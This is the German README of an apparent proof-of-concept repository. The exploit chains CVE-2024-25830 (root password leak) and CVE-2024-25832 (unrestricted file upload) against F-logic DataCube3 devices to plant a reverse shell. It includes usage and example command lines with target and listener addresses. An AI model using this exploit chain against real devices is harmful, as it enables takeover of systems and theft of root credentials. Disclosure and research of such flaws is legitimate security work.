
PoC-Skript für CVE-2024-25832: Exploit-Kette Reverse Shell, Informationsoffenlegung (Root-Passwort-Leak) + uneingeschränkter Dateiupload in DataCube3
Dieses Repository enthält einen Proof of Concept (PoC) für eine zweistufige Exploit-Kette, die auf DataCube3-Geräte abzielt. Sie kombiniert CVE-2024-25830 (Unzureichende Zugriffskontrolle) zum Extrahieren von Root-Passwörtern und CVE-2024-25832 (Uneingeschränkter Dateiupload) zum Bereitstellen eines Reverse-Shell-Skripts. Dieser PoC ergänzt die detaillierte Schwachstellenanalyse im Blogbeitrag „DataCube3 Vulnerability Report“.
Alle F-logic DataCube3-Geräte der Version 1.0.
# Usage: python datacube3.py --RHOST <Target-IP> --RPORT <Target-Port> --LHOST <Local-IP> --LPORT <Local-Port>
# Example: python datacube3.py --RHOST 192.168.1.1 --RPORT 443 --LHOST 192.168.1.100 --LPORT 4444

NUR FÜR BILDUNGSZWECKE.